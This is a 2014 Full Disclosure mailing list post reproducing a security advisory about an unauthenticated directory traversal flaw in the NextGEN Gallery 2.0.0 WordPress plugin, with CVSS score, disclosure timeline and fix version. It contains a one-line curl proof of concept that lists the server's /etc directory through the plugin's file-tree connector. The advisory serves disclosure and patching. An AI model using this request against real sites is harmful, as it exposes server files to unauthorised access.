Full Disclosure mailing list archives
Directory traversal in NextGEN Gallery 2.0.0 (WordPress plugin)
From: Harry Metcalfe <harry () dxw com>
Date: Tue, 18 Feb 2014 21:02:36 +0000
https://security.dxw.com/advisories/directory-traversal-in-nextgen-gallery-2-0-0/
Details ================ Software: NextGEN Gallery Version: 2.0.0 Homepage: http://wordpress.org/plugins/nextgen-gallery/ CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:N) Description ================ Directory traversal in NextGEN Gallery 2.0.0 Vulnerability ================An unauthenticated POST request to a particular URI with a particular parameter lists the contents of arbitrary directories.Proof of concept ================curl -i -d 'dir=/etc/' http://localhost/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_addgallery_page/static/jquery.filetree/connectors/jqueryFileTree.phpMitigations ================This issue is reported to be fixed as of version 2.0.7. Prior versions should be updated immediately.Timeline ================ 2013-08-09: Reported to vendor 2013-08-09: Vendor reports fixed 2014-02-18: Published Discovered by: ================ Tom Adams
-- Harry Metcalfe 07790 559 876 @harrym _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Directory traversal in NextGEN Gallery 2.0.0 (WordPress plugin) Harry Metcalfe (Feb 18)